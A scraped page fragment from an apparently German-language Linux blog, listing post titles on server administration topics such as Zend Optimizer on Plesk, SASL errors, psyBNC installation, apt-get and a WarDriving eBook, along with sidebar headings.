Install Zend Optimizer on Plesk 9

warning: SASL authentication failure: cannot connect to saslauthd server: No such file or directory

Konsolenbefehle (CMD und Bash)

install psybnc on linux

Root Passwort löschen

apt-get Package Management

[eBook] WLAN – WarDriving

Letzte Kommentare

Kategorien

RSS

Einträge in der Kategorie Linux Stuff

Letzte Kommentare

Kategorien

RSS

Tags